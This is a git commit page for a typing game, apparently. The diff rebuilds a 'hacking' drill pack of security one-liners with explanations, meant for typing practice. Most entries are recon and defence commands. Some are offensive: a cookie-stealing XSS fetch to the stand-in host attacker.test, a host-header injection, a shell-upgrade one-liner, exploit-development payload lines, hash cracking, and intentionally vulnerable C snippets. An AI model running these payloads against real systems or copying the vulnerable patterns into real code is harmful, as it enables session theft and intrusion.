diff options
| author | srdusr <[email protected]> | 2025-12-07 21:58:00 +0200 |
|---|---|---|
| committer | srdusr <[email protected]> | 2025-12-07 21:58:00 +0200 |
| commit | 8fc4440150ce84c9cc3f5ec13d50beb58a5b65bc (patch) | |
| tree | 4455ba7bc2f94dc2684629880d38997f516cd95a /data/packs/hacking.json | |
| parent | 5b1ea38522dbf6bf60db5a2270463de0c12d9de3 (diff) | |
| download | typerpunk-8fc4440150ce84c9cc3f5ec13d50beb58a5b65bc.tar.gz typerpunk-8fc4440150ce84c9cc3f5ec13d50beb58a5b65bc.zip | |
Rebuild the generic packs, add shell and sysadmin, fix short race passages
The packs were not proper. An audit found 86 of 253 items (33%) carrying an
attribution that just restated the category - prose *about* a topic with an
invented source, which is the same fault the movies pack had. Six of thirteen
packs were mostly that: technology had 15 items and one distinct attribution.
- science, technology, history, nature and business are now sourced quotes
with real attributions: Feynman, Curie, Hopper, Dijkstra, Lincoln, Carson,
Drucker, Goodhart. 82 items, all attributed to a person or a work.
- general is original factual prose, so it now carries no attribution at all
rather than claiming "General knowledge" as a source. merge_packs no longer
invents one from the pack's filename.
- Four explanatory passages in philosophy lost their "Philosophy" attribution
for the same reason.
- One duplicated passage removed.
Generic attributions: 86/253 before, 0/349 now.
New technical packs
- shell: 24 awk, sed and pipeline drills, each explaining what the line does
- field splitting, associative arrays, !seen[$0]++, process substitution,
xargs -0, strict mode.
- sysadmin: 24 operational one-liners across systemd, disk, processes,
network, permissions, SSH, backup and containers.
- programming grew to 37 and hacking to 30, with git bisect, window
functions, EXPLAIN ANALYZE, certificate transparency and capability audits.
- All 115 technical drills carry an explanation.
Race passage length
- Multiplayer drew from the same pool as single player, so a race could land
on a 22-character quote and be over before anyone had their hands in
position. Races now require 120 characters; the filter is applied when the
pool is loaded, not to the packs, since a short quote is fine to type alone.
For reference, TypeRacer organises by difficulty and language rather than
topic: one default English pool of ~11,900 texts plus per-language universes
and specials (accuracy, repeat, easytexts, anime). Their scale comes from user
submission with moderation, which is still the feature this does not have.
Diffstat (limited to 'data/packs/hacking.json')
| -rw-r--r-- | data/packs/hacking.json | 235 |
1 files changed, 212 insertions, 23 deletions
diff --git a/data/packs/hacking.json b/data/packs/hacking.json index 471c8d0..9bc3b04 100644 --- a/data/packs/hacking.json +++ b/data/packs/hacking.json @@ -1,24 +1,213 @@ [ - {"category":"hacking","language":"shell","attribution":"Recon","explanation":"A TCP SYN scan of the top 1000 ports. -sV asks each open port for its service banner, which is what turns a port list into a target list.","content":"nmap -sS -sV -T4 --top-ports 1000 10.0.0.0/24"}, - {"category":"hacking","language":"shell","attribution":"Recon","explanation":"Resolves a wordlist of names against a domain. Subdomains are where forgotten staging boxes live.","content":"gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt -t 40"}, - {"category":"hacking","language":"shell","attribution":"Recon","explanation":"Pulls every unique path a site references from its own JavaScript. Endpoints that no link points at are still endpoints.","content":"curl -s https://target/app.js | grep -oE '\"/[a-zA-Z0-9_/-]+\"' | sort -u"}, - {"category":"hacking","language":"shell","attribution":"Web","attribution_note":"","explanation":"Directory brute force. -x tries extensions, so index.php.bak and config.old surface alongside directories.","content":"ffuf -u https://target/FUZZ -w wordlist.txt -e .php,.bak,.old -mc 200,301,403"}, - {"category":"hacking","language":"shell","attribution":"Web","explanation":"Requests a path with an absolute URL to see whether the proxy in front trusts it. A different response here often means an internal service is reachable.","content":"curl -s -o /dev/null -w '%{http_code}' 'https://target/@internal/admin'"}, - {"category":"hacking","language":"shell","attribution":"Web","explanation":"A header the application echoes back into a redirect or a password-reset link is a host header injection.","content":"curl -H 'X-Forwarded-Host: attacker.test' -s https://target/reset | grep -i location"}, - {"category":"hacking","language":"clike","attribution":"Memory safety","explanation":"The classic overflow: strcpy writes until it finds a NUL, buf holds 64 bytes, and nothing checks which is larger.","content":"char buf[64]; strcpy(buf, argv[1]); /* no bound - argv[1] decides the write length */"}, - {"category":"hacking","language":"clike","attribution":"Memory safety","explanation":"Freed then used. The allocator may hand that block to something else between the two lines, so the write lands in another object.","content":"free(ptr); ptr->next = head; /* use after free: the block may belong to someone else now */"}, - {"category":"hacking","language":"clike","attribution":"Memory safety","explanation":"An attacker-controlled format string. Every %x walks the stack; %n writes to it.","content":"printf(user_input); /* format string bug - should be printf(\"%s\", user_input) */"}, - {"category":"hacking","language":"python","attribution":"Exploit dev","explanation":"A cyclic pattern. Whatever four bytes end up in the instruction pointer tell you the exact offset to the return address.","content":"payload = b'A' * 72 + p64(0x401196) + p64(win_addr)"}, - {"category":"hacking","language":"python","attribution":"Exploit dev","explanation":"Leaks a libc address from the GOT, then rebases every other libc symbol off it. This is how ASLR is worked around rather than defeated.","content":"libc.address = leak - libc.symbols['puts']"}, - {"category":"hacking","language":"shell","attribution":"Crypto","explanation":"An MD5 of a known-weak hash type. Modern password hashing exists because this takes seconds, not years.","content":"hashcat -m 0 -a 0 hashes.txt rockyou.txt --force"}, - {"category":"hacking","language":"shell","attribution":"Crypto","explanation":"Reads the certificate a host presents. Expiry dates and hostname mismatches are found here, not in a browser warning.","content":"openssl s_client -connect target:443 -servername target < /dev/null | openssl x509 -noout -text"}, - {"category":"hacking","language":"shell","attribution":"Post-exploitation","explanation":"Finds setuid binaries. Anything unusual here runs as its owner no matter who executes it.","content":"find / -perm -4000 -type f 2>/dev/null"}, - {"category":"hacking","language":"shell","attribution":"Post-exploitation","explanation":"Lists what the current user may run as root. A single entry with NOPASSWD is often the whole path to root.","content":"sudo -l 2>/dev/null | grep -E 'NOPASSWD|\\(ALL\\)'"}, - {"category":"hacking","language":"shell","attribution":"Post-exploitation","explanation":"Upgrades a dumb shell to a real TTY, so job control, tab completion and su all start working.","content":"python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"}, - {"category":"hacking","language":"javascript","attribution":"Web","explanation":"A stored XSS payload that steals a session. HttpOnly on the cookie is what stops this line reading it.","content":"fetch('//attacker.test/?c=' + encodeURIComponent(document.cookie))"}, - {"category":"hacking","language":"javascript","attribution":"Web","explanation":"Prototype pollution: writing through __proto__ reaches every object that inherits from it.","content":"JSON.parse('{\"__proto__\": {\"isAdmin\": true}}')"}, - {"category":"hacking","language":"shell","attribution":"Defence","explanation":"Blocks everything inbound by default and allows what is needed back. A deny-by-default policy is the only kind worth writing.","content":"iptables -P INPUT DROP && iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"}, - {"category":"hacking","language":"shell","attribution":"Defence","explanation":"Watches authentication failures as they happen. Most intrusions are visible in logs long before they are noticed.","content":"journalctl -u sshd -f | grep -Ei 'failed|invalid user'"}, - {"category":"hacking","language":"shell","attribution":"Defence","explanation":"Compares installed files against the package manager's own checksums. A changed system binary shows up here.","content":"pacman -Qkk 2>&1 | grep -v ' 0 altered files'"}, - {"category":"hacking","language":"python","attribution":"Defence","explanation":"Constant-time comparison. A plain == returns early on the first differing byte, which leaks the answer through timing.","content":"if not hmac.compare_digest(expected_sig, provided_sig): raise ValueError('bad signature')"} -] + { + "category": "hacking", + "language": "shell", + "attribution": "Recon", + "explanation": "A TCP SYN scan of the top 1000 ports. -sV asks each open port for its service banner, which is what turns a port list into a target list.", + "content": "nmap -sS -sV -T4 --top-ports 1000 10.0.0.0/24" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Recon", + "explanation": "Resolves a wordlist of names against a domain. Subdomains are where forgotten staging boxes live.", + "content": "gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt -t 40" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Recon", + "explanation": "Pulls every unique path a site references from its own JavaScript. Endpoints that no link points at are still endpoints.", + "content": "curl -s https://target/app.js | grep -oE '\"/[a-zA-Z0-9_/-]+\"' | sort -u" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Web", + "attribution_note": "", + "explanation": "Directory brute force. -x tries extensions, so index.php.bak and config.old surface alongside directories.", + "content": "ffuf -u https://target/FUZZ -w wordlist.txt -e .php,.bak,.old -mc 200,301,403" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Web", + "explanation": "Requests a path with an absolute URL to see whether the proxy in front trusts it. A different response here often means an internal service is reachable.", + "content": "curl -s -o /dev/null -w '%{http_code}' 'https://target/@internal/admin'" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Web", + "explanation": "A header the application echoes back into a redirect or a password-reset link is a host header injection.", + "content": "curl -H 'X-Forwarded-Host: attacker.test' -s https://target/reset | grep -i location" + }, + { + "category": "hacking", + "language": "clike", + "attribution": "Memory safety", + "explanation": "The classic overflow: strcpy writes until it finds a NUL, buf holds 64 bytes, and nothing checks which is larger.", + "content": "char buf[64]; strcpy(buf, argv[1]); /* no bound - argv[1] decides the write length */" + }, + { + "category": "hacking", + "language": "clike", + "attribution": "Memory safety", + "explanation": "Freed then used. The allocator may hand that block to something else between the two lines, so the write lands in another object.", + "content": "free(ptr); ptr->next = head; /* use after free: the block may belong to someone else now */" + }, + { + "category": "hacking", + "language": "clike", + "attribution": "Memory safety", + "explanation": "An attacker-controlled format string. Every %x walks the stack; %n writes to it.", + "content": "printf(user_input); /* format string bug - should be printf(\"%s\", user_input) */" + }, + { + "category": "hacking", + "language": "python", + "attribution": "Exploit dev", + "explanation": "A cyclic pattern. Whatever four bytes end up in the instruction pointer tell you the exact offset to the return address.", + "content": "payload = b'A' * 72 + p64(0x401196) + p64(win_addr)" + }, + { + "category": "hacking", + "language": "python", + "attribution": "Exploit dev", + "explanation": "Leaks a libc address from the GOT, then rebases every other libc symbol off it. This is how ASLR is worked around rather than defeated.", + "content": "libc.address = leak - libc.symbols['puts']" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Crypto", + "explanation": "An MD5 of a known-weak hash type. Modern password hashing exists because this takes seconds, not years.", + "content": "hashcat -m 0 -a 0 hashes.txt rockyou.txt --force" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Crypto", + "explanation": "Reads the certificate a host presents. Expiry dates and hostname mismatches are found here, not in a browser warning.", + "content": "openssl s_client -connect target:443 -servername target < /dev/null | openssl x509 -noout -text" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Post-exploitation", + "explanation": "Finds setuid binaries. Anything unusual here runs as its owner no matter who executes it.", + "content": "find / -perm -4000 -type f 2>/dev/null" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Post-exploitation", + "explanation": "Lists what the current user may run as root. A single entry with NOPASSWD is often the whole path to root.", + "content": "sudo -l 2>/dev/null | grep -E 'NOPASSWD|\\(ALL\\)'" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Post-exploitation", + "explanation": "Upgrades a dumb shell to a real TTY, so job control, tab completion and su all start working.", + "content": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'" + }, + { + "category": "hacking", + "language": "javascript", + "attribution": "Web", + "explanation": "A stored XSS payload that steals a session. HttpOnly on the cookie is what stops this line reading it.", + "content": "fetch('//attacker.test/?c=' + encodeURIComponent(document.cookie))" + }, + { + "category": "hacking", + "language": "javascript", + "attribution": "Web", + "explanation": "Prototype pollution: writing through __proto__ reaches every object that inherits from it.", + "content": "JSON.parse('{\"__proto__\": {\"isAdmin\": true}}')" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Defence", + "explanation": "Blocks everything inbound by default and allows what is needed back. A deny-by-default policy is the only kind worth writing.", + "content": "iptables -P INPUT DROP && iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Defence", + "explanation": "Watches authentication failures as they happen. Most intrusions are visible in logs long before they are noticed.", + "content": "journalctl -u sshd -f | grep -Ei 'failed|invalid user'" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Defence", + "explanation": "Compares installed files against the package manager's own checksums. A changed system binary shows up here.", + "content": "pacman -Qkk 2>&1 | grep -v ' 0 altered files'" + }, + { + "category": "hacking", + "language": "python", + "attribution": "Defence", + "explanation": "Constant-time comparison. A plain == returns early on the first differing byte, which leaks the answer through timing.", + "content": "if not hmac.compare_digest(expected_sig, provided_sig): raise ValueError('bad signature')" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Recon", + "explanation": "Certificate transparency logs list every name a CA has issued for a domain, including hosts that were never meant to be public.", + "content": "curl -s 'https://crt.sh/?q=%25.example.com&output=json' | jq -r '.[].name_value' | sort -u" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Web", + "explanation": "Checks whether a session cookie carries the flags that stop JavaScript reading it and stop it crossing sites.", + "content": "curl -sI https://target/login | grep -i 'set-cookie' | grep -ci 'httponly.*secure'" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Web", + "explanation": "Requests the same path twice with different cache-busting keys to see whether a proxy will serve one user's response to another.", + "content": "curl -s 'https://target/?x=1' -H 'X-Forwarded-Scheme: nothttps' -o /dev/null -w '%{http_code} %{time_total}\\n'" + }, + { + "category": "hacking", + "language": "python", + "attribution": "Crypto", + "explanation": "A length-extension attack works because the hash's internal state is its output. HMAC exists precisely to stop this.", + "content": "forged = hashlib.sha256(secret_len * b'\\x00' + original + padding + suffix).hexdigest()" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Post-exploitation", + "explanation": "Capabilities are finer-grained than setuid but grant real power. cap_setuid on an interpreter is root.", + "content": "getcap -r / 2>/dev/null | grep -E 'cap_(setuid|dac_override|sys_admin)'" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Defence", + "explanation": "Audits which accounts can escalate, and how. The answer is usually longer than anyone expects.", + "content": "grep -rE '^[^#].*(ALL|NOPASSWD)' /etc/sudoers /etc/sudoers.d/ 2>/dev/null" + }, + { + "category": "hacking", + "language": "shell", + "attribution": "Defence", + "explanation": "Compares running kernel modules against what the package manager installed. An unexpected module is worth explaining.", + "content": "lsmod | awk 'NR>1 {print $1}' | while read m; do modinfo -n \"$m\" 2>/dev/null; done | grep -v '^/lib/modules'" + }, + { + "category": "hacking", + "language": "python", + "attribution": "Defence", + "explanation": "Parameterised queries send the values separately from the statement, so nothing the user types can become SQL.", + "content": "cur.execute('SELECT * FROM users WHERE name = %s AND active = %s', (name, True))" + } +]
\ No newline at end of file |